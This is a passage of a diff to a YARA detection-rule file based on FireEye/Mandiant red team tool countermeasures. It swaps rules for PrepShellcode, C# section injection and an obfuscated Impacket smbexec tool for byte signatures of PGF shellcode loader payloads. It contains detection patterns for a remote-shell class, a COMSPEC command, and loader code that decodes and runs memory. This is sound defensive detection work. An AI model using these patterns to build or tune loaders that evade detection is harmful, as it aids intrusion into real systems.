+		$cond1 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 13 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 66 23 00 00 48 8B 4C 24 40 FF 15 EB F9 FF FF B8 01 00 00 00 48 83 C4 38 C3 }
+		$cond2 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 A3 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 F6 20 00 00 48 8B 4C 24 40 FF 15 7B FA FF FF B8 01 00 00 00 48 83 C4 38 C3 }
+		$cond3 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? 8B 44 24 48 89 44 24 20 83 7C 24 2? ?1 74 ?? EB ?? 48 8B 44 24 40 48 ?? ?? ?? ?? ?? ?? 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? 48 83 C4 38 C3 }
+		$cond4 = { 4C 89 44 24 ?? 89 54 24 ?? 48 89 4C 24 ?? 48 83 EC 38 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? 01 74 ?? EB ?? 48 8B 44 24 ?? 48 89 05 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 48 83 C4 38 C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Prepshellcode_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'PrepShellcode' project."
+		description = "base dlls: /lib/payload/techniques/dllmain/"
 		author = "FireEye"
-		id = "32fb6b1d-e01f-5555-8516-088dca2166cf"
-		date = "2020-12-08"
+		id = "5253cb2a-28fd-57ab-be3d-f11cf2ea24cf"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PREPSHELLCODE/production/yara/HackTool_MSIL_PrepShellcode_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "aedae87d84275f6589c982c04175ddc0aee3e4f3ae959ced4b4e2294675522e6"
+		hash = "4326a7e863928ffbb5f6bdf63bb9126e"
+		logic_hash = "074f6d9ad78ecd4dd8e3d0b5c8b0f61a48374f3935b85c4222305b207b447ec7"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$typelibguid0 = "d16ed275-70d5-4ae5-8ce7-d249f967616c" ascii nocase wide
+		$sb1 = { B9 [4] FF 15 [4-32] 8B ?? 1C [0-16] 0F B? ?? 04 [0-64] F3 0F 6F 00 [0-64] 66 0F EF C8 [0-64] F3 0F 7F 08 [0-64] 30 ?? 48 8D 40 01 48 83 ?? 01 7? }
+		$sb2 = { 44 8B ?? 08 [0-32] 41 B8 00 30 00 00 [0-16] FF 15 [4-32] 48 8B C8 [0-16] E8 [4-64] 4D 8D 49 01 [0-32] C1 ?? 04 [0-64] 0F B? [2-16] 41 30 ?? FF 45 3? ?? 7? }
+		$sb3 = { 63 ?? 3C [0-16] 03 [1-32] 0F B? ?? 14 [0-16] 8D ?? 18 [0-16] 03 [1-16] 66 ?? 3B ?? 06 7? [1-64] 48 8D 15 [4-32] FF 15 [4-16] 85 C0 [2-32] 41 0F B? ?? 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_1
+rule FIREEYE_RT_APT_Loader_Win32_PGF_5 : FILE
 {
 	meta:
-		description = "smbexec"
+		description = "PGF payload, generated rule based on symfunc/a86b004b5005c0bcdbd48177b5bac7b8"
 		author = "FireEye"
-		id = "992d1132-3136-5e1b-a1ef-dcdf36ebf0f5"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "376875f3-00f2-58d0-ae22-7f52ea566da2"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Smbexec)/production/yara/HackTool_PY_ImpacketObfuscation_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_5.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "0b1e512afe24c31531d6db6b47bac8ee"
-		logic_hash = "45a4c0426b29b8c8bede9c4e8292131da7e756d48fc3ac4a07d08fd52383d21e"
+		hash = "8c91a27bbdbe9fb0877daccd28bd7bb5"
+		logic_hash = "dfff615a1d329cf181294f7b0a32c11a21d66ff8a6aa6b9fcd183c9738369623"
 		score = 75
-		quality = 50
-		tags = ""
-		rev = 1
+		quality = 75
+		tags = "FILE"
+		rev = 3
 
 	strings:
-		$s1 = "class CMDEXEC" nocase
-		$s2 = "class RemoteShell" nocase
-		$s3 = "self.services_names"
-		$s4 = "import random"
-		$s6 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]%CoMSpEC%[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
-		$s7 = /self\.__serviceName[\x09\x20]{0,32}=[\x09\x20]{0,32}self\.services_names\[random\.randint\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}len\(self\.services_names\)[\x09\x20]{0,32}-[\x09\x20]{0,32}1\)\]/
+		$cond1 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 10 30 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 5C 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 00 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
+		$cond2 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 20 33 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 58 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 2C 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
+		$cond3 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 C7 45 ?? 00 00 00 00 C6 85 ?? ?? ?? ?? 00 68 03 01 00 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 ?? 00 00 00 00 C6 45 ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 9C 10 00 10 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 6A 14 FF 15 ?? ?? ?? ?? 83 C4 04 89 45 ?? 8B 45 ?? 8A 48 ?? 88 4D ?? 8B 55 ?? 83 C2 0C 8B 45 ?? 8B 0A 89 08 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 52 ?? 89 50 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 83 C0 01 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 14 7D ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 11 0F B6 45 ?? 33 D0 8B 4D ?? 03 8D ?? ?? ?? ?? 88 11 EB ?? 8B 55 ?? 8B 42 ?? 89 45 ?? 6A 40 68 00 30 00 00 8B 4D ?? 51 6A 00 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B 45 ?? 83 C0 20 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 83 C2 01 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 09 8B 85 ?? ?? ?? ?? 99 BE 14 00 00 00 F7 FE 8B 45 ?? 0F B6 14 10 33 CA 8B 45 ?? 03 85 ?? ?? ?? ?? 88 08 EB ?? 8B 4D ?? 89 4D ?? FF 55 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
+		$cond4 = { 8B FF 55 8B EC 81 EC 3? ?1 ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 E0 56 C7 45 F8 ?? ?? ?? ?? C6 85 D8 FE FF FF ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 D9 FE FF FF 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 F4 ?? ?? ?? ?? C6 45 E7 ?? C7 45 E8 ?? ?? ?? ?? C7 45 EC ?? ?? ?? ?? C7 45 FC ?? ?? ?? ?? C7 45 F? ?? ?? ?? ?0 6A ?? 6A ?? 8D 8D D8 FE FF FF 51 6A ?? 68 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 F8 6A ?? FF ?? ?? ?? ?? ?? 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 ?? ?? 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF ?? ?? ?? ?? EB ?? 8B 85 D4 FE FF FF 83 C? ?1 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D ?? 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB ?? 8B 55 F8 8B 42 08 89 45 FC 6A ?? 68 ?? ?? ?? ?? 8B 4D FC 51 6A ?? FF ?? ?? ?? ?? ?? 89 45 EC 8B 55 FC 52 8B 45 F8 83 ?? ?? 50 8B 4D EC 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 D0 FE FF FF ?? ?? ?? ?? EB ?? 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 ?? 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE ?? ?? ?? ?? F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB ?? 8B 4D EC 89 4D F0 FF ?? ?? 5E 8B 4D E0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
 }
-rule FIREEYE_RT_Loader_MSIL_Csharpsectioninjection_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_3 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'C_Sharp_SectionInjection' project."
+		description = "PGF payload, generated rule based on symfunc/8a2f2236fdfaa3583ab89076025c6269. Identifies dllmain_hook x64 payloads."
 		author = "FireEye"
-		id = "ca5bf5cd-1950-53ed-8984-e880a15e658e"
+		id = "340ea6d4-7111-520c-9bd4-0465a43ea235"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSECTIONINJECTION/production/yara/Loader_MSIL_CSharpSectionInjection_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_3.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "011cf4dffe6ef90a79cdfabb0e297152c00b0404b1801f56fd7e703ab90b1692"
+		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
+		logic_hash = "fd82bdec54a76eed12cc8820ef39899f31ea6df21d905530a0d53770b3d9901b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$typelibguid0 = "d77135da-0496-4b5c-9afe-e1590a4c136a" ascii nocase wide
+		$cond1 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 80 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 5A B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 E9 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AC 96 01 00 48 8D 45 AF 48 89 C1 E8 F0 FE 00 00 48 8B 05 25 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6B B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 AA B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 61 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 4F B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 20 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 0E C8 05 00 48 8B 05 69 8A 06 00 FF D0 48 8D 15 0A C8 05 00 48 89 C1 48 8B 05 5E 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 19 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 01 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 E0 F9 FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 87 F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CB 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 37 FC 00 00 48 89 D8 48 89 C1 E8 4C AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9A 9C 01 00 48 89 D8 48 89 C1 E8 2F AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$cond2 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8D 85 ?? ?? ?? ?? 41 B8 04 01 00 00 48 89 C2 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 89 C2 B9 08 00 00 00 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 38 04 00 00 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 48 8D 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 41 B8 00 00 00 00 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 FF 0F 95 C0 84 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 48 8B 45 ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 45 ?? 48 89 E8 48 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 C7 45 ?? 00 00 00 00 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 39 C2 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 73 ?? 48 8B 45 ?? 48 8B 00 48 8B 55 ?? 48 81 C2 00 10 00 00 48 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 8B 4D ?? 48 8B 55 ?? 48 01 CA 48 39 D0 0F 83 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 8B 45 ?? 48 8B 00 48 8D 95 ?? ?? ?? ?? 41 B8 30 00 00 00 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 48 8B 45 ?? 48 8B 00 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 00 00 00 00 EB ?? 90 EB ?? 90 48 83 45 ?? 08 E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 48 63 D0 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 89 C2 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 01 00 00 00 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB 01 EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$cond3 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 C1 7C 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 33 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 B2 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 75 96 01 00 48 8D 45 AF 48 89 C1 E8 B9 FE 00 00 48 8B 05 66 7C 06 00 FF D0 89 C2 B9 08 00 00 00 E8 3C B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 83 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 2A F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 28 B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 69 7B 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 11 B9 05 00 48 8B 05 A2 7B 06 00 FF D0 48 8D 15 0D B9 05 00 48 89 C1 48 8B 05 97 7B 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 5A 7B 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 22 7B 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 59 FB FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 